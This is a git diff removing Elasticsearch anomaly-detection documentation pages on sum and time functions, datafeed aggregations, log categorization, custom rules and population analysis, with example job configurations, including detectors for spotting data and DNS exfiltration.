-If you want to monitor unusually high sum values, use the `high_sum` function.
-
-If you want to monitor unusually low sum values, use the `low_sum` function.
-
-These functions support the following properties:
-
-* `field_name` (required)
-* `by_field_name` (optional)
-* `over_field_name` (optional)
-* `partition_field_name` (optional)
-
-For more information about those properties, see the
-{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API].
-
-.Example 1: Analyzing total expenses with the sum function
-[source,js]
---------------------------------------------------
-{
-  "function" : "sum",
-  "field_name" : "expenses",
-  "by_field_name" : "costcenter",
-  "over_field_name" : "employee"
-}
---------------------------------------------------
-// NOTCONSOLE
-
-If you use this `sum` function in a detector in your {anomaly-job}, it
-models total expenses per employee for each cost center. For each time bucket,
-it detects when an employee’s expenses are unusual for a cost center compared
-to other employees.
-
-.Example 2: Analyzing total bytes with the high_sum function
-[source,js]
---------------------------------------------------
-{
-  "function" : "high_sum",
-  "field_name" : "cs_bytes",
-  "over_field_name" : "cs_host"
-}
---------------------------------------------------
-// NOTCONSOLE
-
-If you use this `high_sum` function in a detector in your {anomaly-job}, it
-models total `cs_bytes`. It detects `cs_hosts` that transfer unusually high
-volumes compared to other `cs_hosts`. This example looks for volumes of data
-transferred from a client to a server on the internet that are unusual compared
-to other clients. This scenario could be useful to detect data exfiltration or
-to find users that are abusing internet privileges.
-
-[discrete]
-[[ml-nonnull-sum]]
-== Non_null_sum, high_non_null_sum, low_non_null_sum
-
-The `non_null_sum` function is useful if your data is sparse. Buckets without
-values are ignored and buckets with a zero value are analyzed.
-
-If you want to monitor unusually high totals, use the `high_non_null_sum`
-function.
-
-If you want to look at drops in totals, use the `low_non_null_sum` function.
-
-These functions support the following properties:
-
-* `field_name` (required)
-* `by_field_name` (optional)
-* `partition_field_name` (optional)
-
-For more information about those properties, see the
-{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API].
-
-NOTE: Population analysis (that is to say, use of the `over_field_name` property)
-is not applicable for this function.
-
-.Example 3: Analyzing employee approvals with the high_non_null_sum function
-[source,js]
---------------------------------------------------
-{
-  "function" : "high_non_null_sum",
-  "field_name" : "amount_approved",
-  "by_field_name" : "employee"
-}
---------------------------------------------------
-// NOTCONSOLE
-
-If you use this `high_non_null_sum` function in a detector in your {anomaly-job},
-it models the total `amount_approved` for each employee. It ignores any buckets
-where the amount is null. It detects employees who approve unusually high
-amounts compared to their past behavior.
diff --git a/docs/reference/ml/anomaly-detection/functions/ml-time-functions.asciidoc b/docs/reference/ml/anomaly-detection/functions/ml-time-functions.asciidoc deleted file mode 100644 index 997566e4856..00000000000 --- a/docs/reference/ml/anomaly-detection/functions/ml-time-functions.asciidoc +++ /dev/null @@ -1,105 +0,0 @@ -[role="xpack"] -[[ml-time-functions]] -= Time functions - -The time functions detect events that happen at unusual times, either of the day -or of the week. These functions can be used to find unusual patterns of behavior, -typically associated with suspicious user activity. - -The {ml-features} include the following time functions: - -* <> -* <> - - -[NOTE] -==== -* NOTE: You cannot create forecasts for {anomaly-jobs} that contain time -functions. -* The `time_of_day` function is not aware of the difference between days, for -instance work days and weekends. When modeling different days, use the -`time_of_week` function. In general, the `time_of_week` function is more suited -to modeling the behavior of people rather than machines, as people vary their -behavior according to the day of the week. -* Shorter bucket spans (for example, 10 minutes) are recommended when performing -a `time_of_day` or `time_of_week` analysis. The time of the events being modeled -are not affected by the bucket span, but a shorter bucket span enables quicker -alerting on unusual events. -* Unusual events are flagged based on the previous pattern of the data, not on -what we might think of as unusual based on human experience. So, if events -typically occur between 3 a.m. and 5 a.m., an event occurring at 3 p.m. is -flagged as unusual. -* When Daylight Saving Time starts or stops, regular events can be flagged as -anomalous. This situation occurs because the actual time of the event (as -measured against a UTC baseline) has changed. This situation is treated as a -step change in behavior and the new times will be learned quickly. -==== - -[discrete] -[[ml-time-of-day]] -== Time_of_day - -The `time_of_day` function detects when events occur that are outside normal -usage patterns. For example, it detects unusual activity in the middle of the -night. - -The function expects daily behavior to be similar. If you expect the behavior of -your data to differ on Saturdays compared to Wednesdays, the `time_of_week` -function is more appropriate. - -This function supports the following properties: - -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 1: Analyzing events with the time_of_day function -[source,js] --------------------------------------------------- -{ - "function" : "time_of_day", - "by_field_name" : "process" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `time_of_day` function in a detector in your {anomaly-job}, it -models when events occur throughout a day for each process. It detects when an -event occurs for a process that is at an unusual time in the day compared to -its past behavior. - -[discrete] -[[ml-time-of-week]] -== Time_of_week - -The `time_of_week` function detects when events occur that are outside normal -usage patterns. For example, it detects login events on the weekend. 
- -This function supports the following properties: - -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 2: Analyzing events with the time_of_week function -[source,js] --------------------------------------------------- -{ - "function" : "time_of_week", - "by_field_name" : "eventcode", - "over_field_name" : "workstation" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `time_of_week` function in a detector in your {anomaly-job}, it -models when events occur throughout the week for each `eventcode`. It detects -when a workstation event occurs at an unusual time during the week for that -`eventcode` compared to other workstations. It detects events for a -particular workstation that are outside the normal usage pattern. diff --git a/docs/reference/ml/anomaly-detection/ml-configuring-aggregations.asciidoc b/docs/reference/ml/anomaly-detection/ml-configuring-aggregations.asciidoc deleted file mode 100644 index 7c5f82198c0..00000000000 --- a/docs/reference/ml/anomaly-detection/ml-configuring-aggregations.asciidoc +++ /dev/null @@ -1,330 +0,0 @@ -[role="xpack"] -[[ml-configuring-aggregation]] -= Aggregating data for faster performance - -By default, {dfeeds} fetch data from {es} using search and scroll requests. -It can be significantly more efficient, however, to aggregate data in {es} -and to configure your {anomaly-jobs} to analyze aggregated data. - -One of the benefits of aggregating data this way is that {es} automatically -distributes these calculations across your cluster. You can then feed this -aggregated data into the {ml-features} instead of raw results, which -reduces the volume of data that must be considered while detecting anomalies. - -TIP: If you use a terms aggregation and the cardinality of a term is high, the -aggregation might not be effective and you might want to just use the default -search and scroll behavior. - -[discrete] -[[aggs-limits-dfeeds]] -== Requirements and limitations - -There are some limitations to using aggregations in {dfeeds}. Your aggregation -must include a `date_histogram` aggregation, which in turn must contain a `max` -aggregation on the time field. This requirement ensures that the aggregated data -is a time series and the timestamp of each bucket is the time of the last record -in the bucket. - -IMPORTANT: The name of the aggregation and the name of the field that the agg -operates on need to match, otherwise the aggregation doesn't work. For example, -if you use a `max` aggregation on a time field called `responsetime`, the name -of the aggregation must be also `responsetime`. - -You must also consider the interval of the date histogram aggregation carefully. -The bucket span of your {anomaly-job} must be divisible by the value of the -`calendar_interval` or `fixed_interval` in your aggregation (with no remainder). -If you specify a `frequency` for your {dfeed}, it must also be divisible by this -interval. {anomaly-jobs-cap} cannot use date histograms with an interval -measured in months because the length of the month is not fixed. {dfeeds-cap} -tolerate weeks or smaller units. - -TIP: As a rule of thumb, if your detectors use <> or -<> analytical functions, set the date histogram -aggregation interval to a tenth of the bucket span. 
This suggestion creates -finer, more granular time buckets, which are ideal for this type of analysis. If -your detectors use <> or <> -functions, set the interval to the same value as the bucket span. - -If your {dfeed} uses aggregations, then the **Anomaly Explorer** in {kib} cannot -plot and display an anomaly chart for the job. If model plot is disabled, then -neither can the **Single Metric Viewer** plot and display the chart for the -{anomaly-job}. This limitation does not apply to single metric jobs that have -aggregations with names that match the fields that they operate on. Refer to -<> for an example. - - -[discrete] -[[aggs-include-jobs]] -== Including aggregations in {anomaly-jobs} - -When you create or update an {anomaly-job}, you can include the names of -aggregations, for example: - -[source,console] ----------------------------------- -PUT _ml/anomaly_detectors/farequote -{ - "analysis_config": { - "bucket_span": "60m", - "detectors": [{ - "function": "mean", - "field_name": "responsetime", <1> - "by_field_name": "airline" <1> - }], - "summary_count_field_name": "doc_count" - }, - "data_description": { - "time_field":"time" <1> - } -} ----------------------------------- -// TEST[skip:setup:farequote_data] - -<1> The `airline`, `responsetime`, and `time` fields are aggregations. Only the -aggregated fields defined in the `analysis_config` object are analyzed by the -{anomaly-job}. - -NOTE: When the `summary_count_field_name` property is set to a non-null value, -the job expects to receive aggregated input. The property must be set to the -name of the field that contains the count of raw data points that have been -aggregated. It applies to all detectors in the job. - -[[aggs-in-dfeed]] -The aggregations are defined in the {dfeed} as follows: - -[source,console] ----------------------------------- -PUT _ml/datafeeds/datafeed-farequote -{ - "job_id":"farequote", - "indices": ["farequote"], - "aggregations": { - "buckets": { - "date_histogram": { - "field": "time", - "fixed_interval": "360s", - "time_zone": "UTC" - }, - "aggregations": { - "time": { <1> - "max": {"field": "time"} - }, - "airline": { <2> - "terms": { - "field": "airline", - "size": 100 - }, - "aggregations": { - "responsetime": { <3> - "avg": { - "field": "responsetime" - } - } - } - } - } - } - } -} ----------------------------------- -// TEST[skip:setup:farequote_job] - -<1> The aggregations have names that match the fields that they operate on. The -`max` aggregation is named `time` and its field also needs to be `time`. -<2> The `term` aggregation is named `airline` and its field is also named -`airline`. -<3> The `avg` aggregation is named `responsetime` and its field is also named -`responsetime`. - -Your {dfeed} can contain multiple aggregations, but only the ones with names -that match values in the job configuration are fed to the job. - - -[discrete] -[[aggs-dfeeds]] -== Nested aggregations in {dfeeds} - -{dfeeds-cap} support complex nested aggregations. This example uses the -`derivative` pipeline aggregation to find the first order derivative of the -counter `system.network.out.bytes` for each value of the field `beat.name`. 
- -[source,js] ----------------------------------- -"aggregations": { - "beat.name": { - "terms": { - "field": "beat.name" - }, - "aggregations": { - "buckets": { - "date_histogram": { - "field": "@timestamp", - "fixed_interval": "5m" - }, - "aggregations": { - "@timestamp": { - "max": { - "field": "@timestamp" - } - }, - "bytes_out_average": { - "avg": { - "field": "system.network.out.bytes" - } - }, - "bytes_out_derivative": { - "derivative": { - "buckets_path": "bytes_out_average" - } - } - } - } - } - } -} ----------------------------------- -// NOTCONSOLE - - -[discrete] -[[aggs-single-dfeeds]] -== Single bucket aggregations in {dfeeds} - -{dfeeds-cap} not only supports multi-bucket aggregations, but also single bucket -aggregations. The following shows two `filter` aggregations, each gathering the -number of unique entries for the `error` field. - -[source,js] ----------------------------------- -{ - "job_id":"servers-unique-errors", - "indices": ["logs-*"], - "aggregations": { - "buckets": { - "date_histogram": { - "field": "time", - "interval": "360s", - "time_zone": "UTC" - }, - "aggregations": { - "time": { - "max": {"field": "time"} - } - "server1": { - "filter": {"term": {"source": "server-name-1"}}, - "aggregations": { - "server1_error_count": { - "value_count": { - "field": "error" - } - } - } - }, - "server2": { - "filter": {"term": {"source": "server-name-2"}}, - "aggregations": { - "server2_error_count": { - "value_count": { - "field": "error" - } - } - } - } - } - } - } -} ----------------------------------- -// NOTCONSOLE - - -[discrete] -[[aggs-define-dfeeds]] -== Defining aggregations in {dfeeds} - -When you define an aggregation in a {dfeed}, it must have the following form: - -[source,js] ----------------------------------- -"aggregations": { - ["bucketing_aggregation": { - "bucket_agg": { - ... - }, - "aggregations": {] - "data_histogram_aggregation": { - "date_histogram": { - "field": "time", - }, - "aggregations": { - "timestamp": { - "max": { - "field": "time" - } - }, - [,"": { - "terms":{... - } - [,"aggregations" : { - []+ - } ] - }] - } - } - } - } -} ----------------------------------- -// NOTCONSOLE - -The top level aggregation must be either a -{ref}/search-aggregations-bucket.html[bucket aggregation] containing as single -sub-aggregation that is a `date_histogram` or the top level aggregation is the -required `date_histogram`. There must be exactly one `date_histogram` -aggregation. For more information, see -{ref}/search-aggregations-bucket-datehistogram-aggregation.html[Date histogram aggregation]. - -NOTE: The `time_zone` parameter in the date histogram aggregation must be set to -`UTC`, which is the default value. - -Each histogram bucket has a key, which is the bucket start time. This key cannot -be used for aggregations in {dfeeds}, however, because they need to know the -time of the latest record within a bucket. Otherwise, when you restart a -{dfeed}, it continues from the start time of the histogram bucket and possibly -fetches the same data twice. The max aggregation for the time field is therefore -necessary to provide the time of the latest record within a bucket. - -You can optionally specify a terms aggregation, which creates buckets for -different values of a field. - -IMPORTANT: If you use a terms aggregation, by default it returns buckets for -the top ten terms. Thus if the cardinality of the term is greater than 10, not -all terms are analyzed. - -You can change this behavior by setting the `size` parameter. 
To -determine the cardinality of your data, you can run searches such as: - -[source,js] --------------------------------------------------- -GET .../_search -{ - "aggs": { - "service_cardinality": { - "cardinality": { - "field": "service" - } - } - } -} --------------------------------------------------- -// NOTCONSOLE - -By default, {es} limits the maximum number of terms returned to 10000. For high -cardinality fields, the query might not run. It might return errors related to -circuit breaking exceptions that indicate that the data is too large. In such -cases, do not use aggregations in your {dfeed}. For more information, see -{ref}/search-aggregations-bucket-terms-aggregation.html[Terms aggregation]. - -You can also optionally specify multiple sub-aggregations. The sub-aggregations -are aggregated for the buckets that were created by their parent aggregation. -For more information, see {ref}/search-aggregations.html[Aggregations]. diff --git a/docs/reference/ml/anomaly-detection/ml-configuring-categories.asciidoc b/docs/reference/ml/anomaly-detection/ml-configuring-categories.asciidoc deleted file mode 100644 index 0334e2603f6..00000000000 --- a/docs/reference/ml/anomaly-detection/ml-configuring-categories.asciidoc +++ /dev/null @@ -1,262 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-configuring-categories]] -= Detecting anomalous categories of data - -Categorization is a {ml} process that tokenizes a text field, clusters similar -data together, and classifies it into categories. It works best on -machine-written messages and application output that typically consist of -repeated elements. For example, it works well on logs that contain a finite set -of possible messages: - -//Obtained from it_ops_new_app_logs.json -[source,js] ----------------------------------- -{"@timestamp":1549596476000, -"message":"org.jdbi.v2.exceptions.UnableToExecuteStatementException: com.mysql.jdbc.exceptions.MySQLTimeoutException: Statement cancelled due to timeout or client request [statement:\"SELECT id, customer_id, name, force_disabled, enabled FROM customers\"]", -"type":"logs"} ----------------------------------- -//NOTCONSOLE - -Categorization is tuned to work best on data like log messages by taking token -order into account, including stop words, and not considering synonyms in its -analysis. Complete sentences in human communication or literary text (for -example email, wiki pages, prose, or other human-generated content) can be -extremely diverse in structure. Since categorization is tuned for machine data, -it gives poor results for human-generated data. It would create so many -categories that they couldn't be handled effectively. Categorization is _not_ -natural language processing (NLP). - -When you create a categorization {anomaly-job}, the {ml} model learns what -volume and pattern is normal for each category over time. You can then detect -anomalies and surface rare events or unusual types of messages by using -<> or <> functions. - -In {kib}, there is a categorization wizard to help you create this type of -{anomaly-job}. 
For example, the following job generates categories from the -contents of the `message` field and uses the count function to determine when -certain categories are occurring at anomalous rates: - -[role="screenshot"] -image::images/ml-category-wizard.jpg["Creating a categorization job in Kibana"] - -[%collapsible] -.API example -==== -[source,console] ----------------------------------- -PUT _ml/anomaly_detectors/it_ops_app_logs -{ - "description" : "IT ops application logs", - "analysis_config" : { - "categorization_field_name": "message",<1> - "bucket_span":"30m", - "detectors" :[{ - "function":"count", - "by_field_name": "mlcategory"<2> - }] - }, - "data_description" : { - "time_field":"@timestamp" - } -} ----------------------------------- -// TEST[skip:needs-licence] -<1> This field is used to derive categories. -<2> The categories are used in a detector by setting `by_field_name`, -`over_field_name`, or `partition_field_name` to the keyword `mlcategory`. If you -do not specify this keyword in one of those properties, the API request fails. -==== - - -You can use the **Anomaly Explorer** in {kib} to view the analysis results: - -[role="screenshot"] -image::images/ml-category-anomalies.jpg["Categorization results in the Anomaly Explorer"] - -For this type of job, the results contain extra information for each anomaly: -the name of the category (for example, `mlcategory 2`) and examples of the -messages in that category. You can use these details to investigate occurrences -of unusually high message counts. - -If you use the advanced {anomaly-job} wizard in {kib} or the -{ref}/ml-put-job.html[create {anomaly-jobs} API], there are additional -configuration options. For example, the optional `categorization_examples_limit` -property specifies the maximum number of examples that are stored in memory and -in the results data store for each category. The default value is `4`. Note that -this setting does not affect the categorization; it just affects the list of -visible examples. If you increase this value, more examples are available, but -you must have more storage available. If you set this value to `0`, no examples -are stored. - -Another advanced option is the `categorization_filters` property, which can -contain an array of regular expressions. If a categorization field value matches -the regular expression, the portion of the field that is matched is not taken -into consideration when defining categories. The categorization filters are -applied in the order they are listed in the job configuration, which enables you -to disregard multiple sections of the categorization field value. In this -example, you might create a filter like `[ "\\[statement:.*\\]"]` to remove the -SQL statement from the categorization algorithm. - -[discrete] -[[ml-per-partition-categorization]] -== Per-partition categorization - -If you enable per-partition categorization, categories are determined -independently for each partition. For example, if your data includes messages -from multiple types of logs from different applications, you can use a field -like the ECS {ecs-ref}/ecs-event.html[`event.dataset` field] as the -`partition_field_name` and categorize the messages for each type of log -separately. - -If your job has multiple detectors, every detector that uses the `mlcategory` -keyword must also define a `partition_field_name`. You must use the same -`partition_field_name` value in all of these detectors. Otherwise, when you -create or update a job and enable per-partition categorization, it fails. 
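For example, a per-partition categorization job could look like the following sketch. The job name, bucket span, and the choice of `event.dataset` as the partition field are assumptions; the `stop_on_warn` option is described below:

[source,console]
----------------------------------
PUT _ml/anomaly_detectors/logs_per_partition_categorization
{
  "analysis_config": {
    "bucket_span": "30m",
    "categorization_field_name": "message",
    "per_partition_categorization": {
      "enabled": true,
      "stop_on_warn": true
    },
    "detectors": [{
      "function": "count",
      "by_field_name": "mlcategory",
      "partition_field_name": "event.dataset"
    }]
  },
  "data_description": {
    "time_field": "@timestamp"
  }
}
----------------------------------
// TEST[skip:needs-licence]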
- -When per-partition categorization is enabled, you can also take advantage of a -`stop_on_warn` configuration option. If the categorization status for a -partition changes to `warn`, it doesn't categorize well and can cause a lot of -unnecessary resource usage. When you set `stop_on_warn` to `true`, the job stops -analyzing these problematic partitions. You can thus avoid an ongoing -performance cost for partitions that are unsuitable for categorization. - -[discrete] -[[ml-configuring-analyzer]] -== Customizing the categorization analyzer - -Categorization uses English dictionary words to identify log message categories. -By default, it also uses English tokenization rules. For this reason, if you use -the default categorization analyzer, only English language log messages are -supported, as described in the <>. - -If you use the categorization wizard in {kib}, you can see which categorization -analyzer it uses and highlighted examples of the tokens that it identifies. You -can also change the tokenization rules by customizing the way the categorization -field values are interpreted: - -[role="screenshot"] -image::images/ml-category-analyzer.jpg["Editing the categorization analyzer in Kibana"] - -The categorization analyzer can refer to a built-in {es} analyzer or a -combination of zero or more character filters, a tokenizer, and zero or more -token filters. In this example, adding a -{ref}/analysis-pattern-replace-charfilter.html[`pattern_replace` character filter] -achieves exactly the same behavior as the `categorization_filters` job -configuration option described earlier. For more details about these properties, -see the -{ref}/ml-put-job.html#ml-put-job-request-body[`categorization_analyzer` API object]. - -If you use the default categorization analyzer in {kib} or omit the -`categorization_analyzer` property from the API, the following default values -are used: - -[source,console] --------------------------------------------------- -POST _ml/anomaly_detectors/_validate -{ - "analysis_config" : { - "categorization_analyzer" : { - "tokenizer" : "ml_classic", - "filter" : [ - { "type" : "stop", "stopwords": [ - "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday", - "Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun", - "January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December", - "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec", - "GMT", "UTC" - ] } - ] - }, - "categorization_field_name": "message", - "detectors" :[{ - "function":"count", - "by_field_name": "mlcategory" - }] - }, - "data_description" : { - } -} --------------------------------------------------- - -If you specify any part of the `categorization_analyzer`, however, any omitted -sub-properties are _not_ set to default values. 
- -The `ml_classic` tokenizer and the day and month stopword filter are more or -less equivalent to the following analyzer, which is defined using only built-in -{es} {ref}/analysis-tokenizers.html[tokenizers] and -{ref}/analysis-tokenfilters.html[token filters]: - -[source,console] ----------------------------------- -PUT _ml/anomaly_detectors/it_ops_new_logs3 -{ - "description" : "IT Ops Application Logs", - "analysis_config" : { - "categorization_field_name": "message", - "bucket_span":"30m", - "detectors" :[{ - "function":"count", - "by_field_name": "mlcategory", - "detector_description": "Unusual message counts" - }], - "categorization_analyzer":{ - "tokenizer": { - "type" : "simple_pattern_split", - "pattern" : "[^-0-9A-Za-z_.]+" <1> - }, - "filter": [ - { "type" : "pattern_replace", "pattern": "^[0-9].*" }, <2> - { "type" : "pattern_replace", "pattern": "^[-0-9A-Fa-f.]+$" }, <3> - { "type" : "pattern_replace", "pattern": "^[^0-9A-Za-z]+" }, <4> - { "type" : "pattern_replace", "pattern": "[^0-9A-Za-z]+$" }, <5> - { "type" : "stop", "stopwords": [ - "", - "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday", - "Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun", - "January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December", - "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec", - "GMT", "UTC" - ] } - ] - } - }, - "analysis_limits":{ - "categorization_examples_limit": 5 - }, - "data_description" : { - "time_field":"time", - "time_format": "epoch_ms" - } -} ----------------------------------- -// TEST[skip:needs-licence] - -<1> Tokens basically consist of hyphens, digits, letters, underscores and dots. -<2> By default, categorization ignores tokens that begin with a digit. -<3> By default, categorization also ignores tokens that are hexadecimal numbers. -<4> Underscores, hyphens, and dots are removed from the beginning of tokens. -<5> Underscores, hyphens, and dots are also removed from the end of tokens. - -The key difference between the default `categorization_analyzer` and this -example analyzer is that using the `ml_classic` tokenizer is several times -faster. The difference in behavior is that this custom analyzer does not include -accented letters in tokens whereas the `ml_classic` tokenizer does, although -that could be fixed by using more complex regular expressions. - -If you are categorizing non-English messages in a language where words are -separated by spaces, you might get better results if you change the day or month -words in the stop token filter to the appropriate words in your language. If you -are categorizing messages in a language where words are not separated by spaces, -you must use a different tokenizer as well in order to get sensible -categorization results. - -It is important to be aware that analyzing for categorization of machine -generated log messages is a little different from tokenizing for search. -Features that work well for search, such as stemming, synonym substitution, and -lowercasing are likely to make the results of categorization worse. However, in -order for drill down from {ml} results to work correctly, the tokens that the -categorization analyzer produces must be similar to those produced by the search -analyzer. If they are sufficiently similar, when you search for the tokens that -the categorization analyzer produces then you find the original document that -the categorization field value came from. 
diff --git a/docs/reference/ml/anomaly-detection/ml-configuring-detector-custom-rules.asciidoc b/docs/reference/ml/anomaly-detection/ml-configuring-detector-custom-rules.asciidoc deleted file mode 100644 index c8f1e3b5479..00000000000 --- a/docs/reference/ml/anomaly-detection/ml-configuring-detector-custom-rules.asciidoc +++ /dev/null @@ -1,238 +0,0 @@ -[role="xpack"] -[[ml-configuring-detector-custom-rules]] -= Customizing detectors with custom rules - -<> enable you to change the behavior of anomaly -detectors based on domain-specific knowledge. - -Custom rules describe _when_ a detector should take a certain _action_ instead -of following its default behavior. To specify the _when_ a rule uses -a `scope` and `conditions`. You can think of `scope` as the categorical -specification of a rule, while `conditions` are the numerical part. -A rule can have a scope, one or more conditions, or a combination of -scope and conditions. For the full list of specification details, see the -{ref}/ml-put-job.html#put-customrules[`custom_rules` object] in the create -{anomaly-jobs} API. - -[[ml-custom-rules-scope]] -== Specifying custom rule scope - -Let us assume we are configuring an {anomaly-job} in order to detect DNS data -exfiltration. Our data contain fields "subdomain" and "highest_registered_domain". -We can use a detector that looks like -`high_info_content(subdomain) over highest_registered_domain`. If we run such a -job, it is possible that we discover a lot of anomalies on frequently used -domains that we have reasons to trust. As security analysts, we are not -interested in such anomalies. Ideally, we could instruct the detector to skip -results for domains that we consider safe. Using a rule with a scope allows us -to achieve this. - -First, we need to create a list of our safe domains. Those lists are called -_filters_ in {ml}. Filters can be shared across {anomaly-jobs}. - -You can create a filter in **Anomaly Detection > Settings > Filter Lists** in -{kib} or by using the {ref}/ml-put-filter.html[put filter API]: - -[source,console] ----------------------------------- -PUT _ml/filters/safe_domains -{ - "description": "Our list of safe domains", - "items": ["safe.com", "trusted.com"] -} ----------------------------------- -// TEST[skip:needs-licence] - -Now, we can create our {anomaly-job} specifying a scope that uses the -`safe_domains` filter for the `highest_registered_domain` field: - -[source,console] ----------------------------------- -PUT _ml/anomaly_detectors/dns_exfiltration_with_rule -{ - "analysis_config" : { - "bucket_span":"5m", - "detectors" :[{ - "function":"high_info_content", - "field_name": "subdomain", - "over_field_name": "highest_registered_domain", - "custom_rules": [{ - "actions": ["skip_result"], - "scope": { - "highest_registered_domain": { - "filter_id": "safe_domains", - "filter_type": "include" - } - } - }] - }] - }, - "data_description" : { - "time_field":"timestamp" - } -} ----------------------------------- -// TEST[skip:needs-licence] - -As time advances and we see more data and more results, we might encounter new -domains that we want to add in the filter. 
We can do that in the -**Anomaly Detection > Settings > Filter Lists** in {kib} or by using the -{ref}/ml-update-filter.html[update filter API]: - -[source,console] ----------------------------------- -POST _ml/filters/safe_domains/_update -{ - "add_items": ["another-safe.com"] -} ----------------------------------- -// TEST[skip:setup:ml_filter_safe_domains] - -Note that we can use any of the `partition_field_name`, `over_field_name`, or -`by_field_name` fields in the `scope`. - -In the following example we scope multiple fields: - -[source,console] ----------------------------------- -PUT _ml/anomaly_detectors/scoping_multiple_fields -{ - "analysis_config" : { - "bucket_span":"5m", - "detectors" :[{ - "function":"count", - "partition_field_name": "my_partition", - "over_field_name": "my_over", - "by_field_name": "my_by", - "custom_rules": [{ - "actions": ["skip_result"], - "scope": { - "my_partition": { - "filter_id": "filter_1" - }, - "my_over": { - "filter_id": "filter_2" - }, - "my_by": { - "filter_id": "filter_3" - } - } - }] - }] - }, - "data_description" : { - "time_field":"timestamp" - } -} ----------------------------------- -// TEST[skip:needs-licence] - -Such a detector will skip results when the values of all 3 scoped fields -are included in the referenced filters. - -[[ml-custom-rules-conditions]] -== Specifying custom rule conditions - -Imagine a detector that looks for anomalies in CPU utilization. -Given a machine that is idle for long enough, small movement in CPU could -result in anomalous results where the `actual` value is quite small, for -example, 0.02. Given our knowledge about how CPU utilization behaves we might -determine that anomalies with such small actual values are not interesting for -investigation. - -Let us now configure an {anomaly-job} with a rule that will skip results where -CPU utilization is less than 0.20. - -[source,console] ----------------------------------- -PUT _ml/anomaly_detectors/cpu_with_rule -{ - "analysis_config" : { - "bucket_span":"5m", - "detectors" :[{ - "function":"high_mean", - "field_name": "cpu_utilization", - "custom_rules": [{ - "actions": ["skip_result"], - "conditions": [ - { - "applies_to": "actual", - "operator": "lt", - "value": 0.20 - } - ] - }] - }] - }, - "data_description" : { - "time_field":"timestamp" - } -} ----------------------------------- -// TEST[skip:needs-licence] - -When there are multiple conditions they are combined with a logical `and`. -This is useful when we want the rule to apply to a range. We simply create -a rule with two conditions, one for each end of the desired range. - -Here is an example where a count detector will skip results when the count -is greater than 30 and less than 50: - -[source,console] ----------------------------------- -PUT _ml/anomaly_detectors/rule_with_range -{ - "analysis_config" : { - "bucket_span":"5m", - "detectors" :[{ - "function":"count", - "custom_rules": [{ - "actions": ["skip_result"], - "conditions": [ - { - "applies_to": "actual", - "operator": "gt", - "value": 30 - }, - { - "applies_to": "actual", - "operator": "lt", - "value": 50 - } - ] - }] - }] - }, - "data_description" : { - "time_field":"timestamp" - } -} ----------------------------------- -// TEST[skip:needs-licence] - -[[ml-custom-rules-lifecycle]] -== Custom rules in the lifecycle of a job - -Custom rules only affect results created after the rules were applied. -Let us imagine that we have configured an {anomaly-job} and it has been running -for some time. 
After observing its results we decide that we can employ rules in order to get rid of some uninteresting results. We can use the {ref}/ml-update-job.html[update {anomaly-job} API] to do so. However, the rule we added is only in effect for results created from the moment we added it onwards. Past results remain unaffected.

[[ml-custom-rules-filtering]]
== Using custom rules vs. filtering data

It might appear that using rules is just another way of filtering the data that feeds into an {anomaly-job}. For example, a rule that skips results when the partition field value is in a filter sounds equivalent to having a query that filters out such documents. But it is not. There is a fundamental difference. When the data is filtered out before it reaches a job, it is as if that data never existed for the job. With rules, the data still reaches the job and affects its behavior (depending on the rule actions).

For example, a rule with the `skip_result` action means all data will still be modeled. On the other hand, a rule with the `skip_model_update` action means results will still be created even though the model will not be updated by data matched by a rule.

diff --git a/docs/reference/ml/anomaly-detection/ml-configuring-populations.asciidoc b/docs/reference/ml/anomaly-detection/ml-configuring-populations.asciidoc deleted file mode 100644 index 907d1ca6bf7..00000000000 --- a/docs/reference/ml/anomaly-detection/ml-configuring-populations.asciidoc +++ /dev/null @@ -1,87 +0,0 @@

[role="xpack"]
[[ml-configuring-populations]]
= Performing population analysis

Entities or events in your data can be considered anomalous when:

* Their behavior changes over time, relative to their own previous behavior, or
* Their behavior is different from that of other entities in a specified population.

The latter method of detecting outliers is known as _population analysis_. The {ml} analytics build a profile of what a "typical" user, machine, or other entity does over a specified time period and then identify when one is behaving abnormally compared to the population.

This type of analysis is most useful when the behavior of the population as a whole is mostly homogeneous and you want to identify outliers. In general, population analysis is not useful when members of the population inherently have vastly different behavior. You can, however, segment your data into groups that behave similarly and run these as separate jobs. For example, you can use a query filter in the {dfeed} to segment your data or you can use the `partition_field_name` to split the analysis for the different groups.

Population analysis scales well and has a lower resource footprint than individual analysis of each series. For example, you can analyze populations of hundreds of thousands or millions of entities.

To specify the population, use the `over_field_name` property.
For example:

[source,console]
----------------------------------
PUT _ml/anomaly_detectors/population
{
  "description" : "Population analysis",
  "analysis_config" : {
    "bucket_span":"15m",
    "influencers": [
      "clientip"
    ],
    "detectors": [
      {
        "function": "mean",
        "field_name": "bytes",
        "over_field_name": "clientip" <1>
      }
    ]
  },
  "data_description" : {
    "time_field":"timestamp",
    "time_format": "epoch_ms"
  }
}
----------------------------------
// TEST[skip:needs-licence]

<1> This `over_field_name` property indicates that the metrics for each client (as identified by their IP address) are analyzed relative to other clients in each bucket.

If your data is stored in {es}, you can use the population job wizard in {kib} to create an {anomaly-job} with these same properties. For example, if you add the sample web logs in {kib}, you can use the following job settings in the population job wizard:

[role="screenshot"]
image::images/ml-population-job.png["Job settings in the population job wizard"]

